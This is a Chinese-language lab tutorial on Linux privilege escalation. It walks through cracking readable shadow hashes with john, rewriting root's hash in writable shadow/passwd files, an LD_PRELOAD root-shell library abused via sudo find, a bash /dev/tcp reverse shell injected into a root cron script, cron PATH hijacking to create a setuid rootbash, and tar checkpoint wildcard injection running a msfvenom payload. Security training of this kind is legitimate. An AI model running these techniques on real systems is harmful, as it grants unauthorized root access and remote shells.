文章目录
- 一、可读shadow文件利用提权
- 二、可写shadow文件利用提权
- 三、可写passwd文件利用提权
- 四、sudo环境变量提权
- 配置环境
- 实验
- 五、自动任务文件权限提升
- 配置环境
- 实验
- 六、自动任务PATH环境变量提权
- 七、自动任务通配符提权
一、可读shadow文件利用提权
ls -al /etc/shadow # 查看文件属性,确保当前用户对shadow文件具有可读权限
cat /etc/shadow | grep ':\$' # 查看shadow文件夹,grep相当于过滤器,后面接过滤条件
在
/etc/shadow
文件中,每个用户的密码都是用一个特定的哈希函数加密的。为了避免密码被轻易破解,Linux 系统会使用不同的哈希函数来加密密码。而$y$
中的y
字符则表示使用的是哪种哈希函数,不同的哈希函数对应不同的字符。以下是一些常见的 $y$ 值及其对应的哈希函数:
$1$
表示使用的是MD5
哈希函数;$2$
或$2a$
表示使用的是Blowfish
哈希函数;$5$
表示使用的是SHA-256
哈希函数;$6$
表示使用的是SHA-512
哈希函数。
sudo john --wordlist=/usr/share/wordlist/rockyou.txt hash.txt # john进行破解
二、可写shadow文件利用提权
思路:写入
cp /etc/shadow /tmp/shadow.bak # 备份重要文件
mkpasswd -m sha-512 123456 # 生成hash,hash算法为sha-512
# 替换/etc/shadow中root的密码
mkpasswd
是linux中专门用来生成密码hash的工具,-m
用来指定hash算法。
三、可写passwd文件利用提权
提权肯定最先关注root用户,现代的linux发行版中,密码hash都是存储在/etc/shadow
中,/etc/passwd
中并不直接存储密码hash,通常用X
来占位,但是还是可以直接将密码写入/etcpasswd
中,尝试提权。也就是一个优先级的问题,先读取passwd,再读取shadow文件。
cp /etc/passwd /tmp/passwd.bak # 备份文件
openssl passwd <明文> # openssl passwd生成密码的hash值
# 替换/etc/passwd中的X
生成hash时,也可以用
mkpasswd
,但是passwd文件中生成hash时最好用openssl passwd
,再shadow文件中生成hash用mkpasswd
。
四、sudo环境变量提权
当用whoami
命令查看当前用户的用户名时,显示whoami:无法找到id值为XXX的用户
。原因:当前用没有权限读取/etc/passwd
或者/etc/shadow
。解决方法:修改文件权限,chmod 644 /etc/passwd。
配置环境
adduser test # root用户下新增test用户
# 补充
sudo adduser test sudo # 将test用户添加到sudo组中
sudo deluser test sudo # 将test用户从sudo组中删除
vim /etc/sudoers # 使用root用户编/etc/sudoers文件,/etc/sudoers文件是sudo命令的配置文件
# 添加
Defaults env_keep+=LD_PRELOAD
test ALL=(ALL:ALL) NOPASSWD:/usr/bin/find # 简单来说,用户test可以使用sudo命令执行find命令
test
用户只允许执行sudo find
,其他sudo命令不允许执行。
实验
使用test
用户登录到系统,使用sudo -l
查看当前用户能够以root用户身份执行哪些命令,其实就是看他能执行哪些sudo命令。这里的话,test用户只允许执行sudo find
,且不需要密码
Defaults env_reset
表示默认会重置环境变量,因此自定义的变量会在 sudo 环境中失效,也就不会获取正确的变量值。env_keep
配置项,用于保留部分环境变量不被重置,需要保留的变量就写入双引号之中。secure_path
配置项,其中包含的路径将被当做sudo
环境的PATH
变量使用。也就是说如果在 sudo 环境无法找到某些命令,那么可以将这些命令的路径加入该配置项之中。LD_PRELOAD
是一个环境变量,用于指定在程序加载时预加载的共享库。这个环境变量允许用户在运行程序之前,通过指定预加载的共享库,修改程序的行为。当设置LD_PRELOAD
环境变量时,指定的共享库将在程序加载时优先于其他库加载,并将其函数和符号替换为预加载的库中的函数和符号。LD:Linking Dynamic.
也就是说我们在使用sudo find
命令时,会以root用户的身份执行命令,同时环境变量中的自定义变量将失效,而且执行sudo find
命令之前,会加载共享库文件,共享库文件的路径由LD_PRELOAD
指定。
1、关于
/bin
、/sbin
、/usr/sbin
、/usr/bin
文件夹:
- 从命令功能角度:
/sbin
下的命令属于基本的系统命令,如shutdown
,reboot
,用于启动系统,修复系统。/bin
下存放一些普通的基本命令,如ls
,chmod
等,这些命令在Linux系统里的配置文件脚本里经常用到。- 从用户权限的角度:
/sbin
目录下的命令通常只有管理员才可以运行。/bin
下的命令管理员和一般的用户都可以使用。/usr/sbin
存放的一些非必须的系统命令;/usr/bin
存放一些用户命令。2、链接
- 静态链接(Static Linking):在静态链接中,编译器将所有的目标文件和库文件的机器代码合并到一个单独的可执行文件中。这意味着所有的代码和库都被复制到最终的可执行文件中。例如,linux中,使用C语言编写的代码,需要先经过编译器编译将C语言代码转化为机器码,也就是目标文件(.o文件),再链接所需库文件生成可执行文件(.exe文件)。
- 动态链接(Dynamic Linking):在动态链接中,目标文件中只包含对所需库函数的引用,而不包含实际的函数实现。在程序运行时,操作系统会在内存中加载并链接所需的共享库,将其与程序进行动态链接。常见的动态链接库文件有
.so
(Linux)和.dll
(Windows)。- 加载时链接(Load-time Linking):加载时链接是在程序加载到内存时进行的链接过程。程序在加载时需要引入所需的库,并在加载时解析并链接这些库。这种链接方式介于静态链接和动态链接之间,它使得程序在运行前不需要包含完整的库代码,但仍然需要在每次加载时进行链接。
编写shellcode:
#include <stdio.h> //标准输入输出库
#include <sys/types.h> //数据类型库
#include <stdlib.h> //C语言标准库
#include <unistd.h> //包含setuid和setgid的库
void _init(){
unsetenv("LD_PRELOAD"); //一旦程序结束或重新启动,环境变量将会恢复到其默认或先前设置的状态。
setgid(0);
setuid(0); //程序以root用户身份执行后续操作
system("/bin/bash");
}
编译源代码:
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
# -fPIC:生成位置独立代码(Position Independent Code),可以在内存中的任何位置加载和执行,而不受具体加载地址的限制。
# -shared:指定生成共享库。
# -o <file>:输出文件。
# -nostartfiles:不使用默认的启动文件
提权
sudo LD_PRELOAD=/home/test/shell.so find # 指定共享库位置,执行该命令时,会先加载共享库文件shell.so
其实在shell.c中也可以不用
setuid(0);setgid(0)
,因为在执行sudo find
时本来就是root权限,预先加载共享库shell.so时,也是以root用户的权限去加载的。
五、自动任务文件权限提升
配置环境
写一个自动任务脚本,脚本内容:
echo `date` >> /tmp/useless # 查看当前时间,并写入/tmp/useless目录下
直接编辑vim /etc/crontab
文件,写入定时任务,* * * * * root bash /root/overwrite.sh
,大致意思就是每分钟以root用户允许overwrite.sh
文件。
可以看到定时任务执行成功。
实验
当登录到一台主机后,查看其定时任务:
cat /etc/crontab
可以看到有一个定时任务,每隔一分钟就执行bash /root/overwrite.sh
,且以root用户身份执行。
locate overwrite.sh # 如果不知道脚本路径,就用locate定位文件位置
ls -al # 查看当前用户的文件权限,可写,就直接将反弹shell写入该脚本
bash -i >& /dev/tcp/127.0.0.1/4444 0>&1 # 反弹shell脚本
nc -lnvp 4444 # 攻击机监听4444端口
我的理解是:靶机的shell标准输入、输出、错误输出都与127.0.0.1:4444的输出建立了TCP连接,也就是说靶机shell所有的输出信息都会显示到监听127.0.0.1:4444的shell中,唯独没有解决从127.0.0.1:4444向靶机发送命令。0>&1
是就是将127.0.0.1:4444的标准输入与127.0.0.1:4444的标准输出进行绑定,使得从127.0.0.1:4444来的输入可以发给靶机shell。也可以将0>&1
替换为0>&2
,效果是差不多的。
六、自动任务PATH环境变量提权
cat /etc/crontab
查看当前系统的自动任务后,一方面可以定位定时脚本的位置,然后将shell写到定时脚本中,实现提权;另一方面也可以从/etc/crontab
中的PATH
入手,达到提权目的。
具体如下:在执行自动任务的时候,系统会优先关注/etc/crontab
中的PATH
,而不是使用系统默认的PATH
;自动任务中,脚本路径要么是绝对路径,要么是相对路径,如果是相对路径的话,将会根据PATH
参数去相应的文件夹下找,是否有对应的脚本。,例如,此处overwrite.sh
是相对路径,当执行该脚本的时候,系统会先去/home/test
目录下去找,如果没有,再去/usr/local/sbin
目录下去找,依此类推…
这里的话,因为overwrite.sh
是相对路径,而且/home/test
是第一优先目录,所以可以在/home/test
目录下新建一个overwrite.sh
脚本文件,尽管这不是真正的路径,但是系统还是优先执行/home/test/overwrite.sh
。
vim overwrite.sh
# 内容
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +sx /tmp/rootbash # 必须加s属性,只有加了s属性,才能以root用户的身份去获取shell,否则就还是当前用户的shell
七、自动任务通配符提权
cat /etc/crontab
查看系统临时任务,发现会自动执行/usr/local/bin/compress.sh
。查看该文件,发现:系统会切换到/home/test
目录下,然后用tar
打包该目录下的所有文件,打包到/tmp/backup.tar.gz
。
tar
命令中有两个参数,分别为:--checkpoint
和--checkpoint-action
参数,--checkpoint=n
:每打包n个文件就设置一个检查点,在检查点可以执行任何操作,操作由--checkpoint-action
指定,exec
代表执行外部命令。
msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o shell.elf # 生成二进制的反弹shell,-p:shell类型,-f:文件格式,elf是linux下的二进制文件,-o:输出文件
touch /home/test--checkpoint=1 //注入一个检查点,用于告诉tar存在一个检查点
touch /home/test--checkpoint-action=exec=shell.elf // 在检查点处执行外部命令
—————————————————————————————————————————
待续…